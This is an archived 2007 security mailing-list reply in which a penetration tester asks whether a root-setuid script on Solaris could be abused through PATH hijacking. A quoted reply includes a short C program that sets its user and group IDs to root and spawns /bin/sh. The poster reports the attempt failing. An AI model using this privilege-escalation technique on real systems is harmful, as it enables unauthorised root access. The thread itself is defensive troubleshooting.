Re: solaris root-setuid script to gain root?

From: Vitalik N. (robert.morris.jr@gmail.com)
Date: Sun Jul 01 2007 - 01:53:39 EDT

• Next message: Pete Herzog: "Re: Advanced Network Infrastructure Assessment Questions...."
• Previous message: crazy frog crazy frog: "Re: Extracting information about streams from pcap"
• In reply to: Thomas Pollet: "Re: solaris root-setuid script to gain root?"
• Next in thread: Nathan Sportsman: "Re: solaris root-setuid script to gain root?"
• Reply: Nathan Sportsman: "Re: solaris root-setuid script to gain root?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

On 7/1/07, Thomas Pollet <thomas.pollet@gmail.com> wrote:
> Hello,
>
> On 30/06/07, Vitalik N. <robert.morris.jr@gmail.com> wrote:
> > Hi
> >
> > I was doing pen testing the other day and I found one root suid script
> > left by some of the web developers:
> >
> > -rwsr-x--x 1 root users /home/web/c.cgi
> >
> > which is basically a bash script:
> >
> > ------ cut ------------
> > #!/bin/sh
> >
> > uname
> > ------ cut ------------
> >
> > And our system was recently compromised. Some local user was able to
> > gain root access. Could this script be the way of gaining root access?
> >
> > According to http://www.unix.com/tips-and-tutorials/36711-the-whole-story-on-usr-bin-ksh.html
> > "Because it was not possible to write a secure suid shell script, the concept
> > of suid shell scripts was removed from Unix." But then it says "Solaris now
> > supports suid shell" !
> > I tried modifying the PATH variable and creating my own "uname" program.
> > But my uname program runs with local user privs instead of root. I
> > also tried the
> did you put a setuid(0) in your uname program?
>
> f.i.:
> cat >uname.c<<EOF
> #include <unistd.h>
> int main (int argc, char **argv, char **envp) {
> setuid(0);
> setgid(0);
> execve("/bin/sh",argv,envp);
> }
> EOF
>
> > other attack described in the link above: "link to -i" but this didn't
> > work as well.
> > So could this script be the problem?
> >
> > P.S: The machine runs SunOS 5.6 with all updates
>
> Regards,
> Thomas Pollet
>

Yes, my uname programs was exactly the same. But I used execl call instead
of execve (don't think that would make any difference). I also tried
setting euid
(seteuid(0)).
Using a bash script for "uname" program didn't work either:

% cat uname
#!/bin/sh
touch /tmp/test
chown root /tmp/test

the script complains about privileges and can't execute chown.

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Swap Out your SPI or Watchfire app sec solution for
Cenzic's robust, accurate risk assessment and management
solution FREE - limited Time Offer

http://www.cenzic.com/wf-spi
------------------------------------------------------------------------

• Next message: Pete Herzog: "Re: Advanced Network Infrastructure Assessment Questions...."
• Previous message: crazy frog crazy frog: "Re: Extracting information about streams from pcap"
• In reply to: Thomas Pollet: "Re: solaris root-setuid script to gain root?"
• Next in thread: Nathan Sportsman: "Re: solaris root-setuid script to gain root?"
• Reply: Nathan Sportsman: "Re: solaris root-setuid script to gain root?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:55 EDT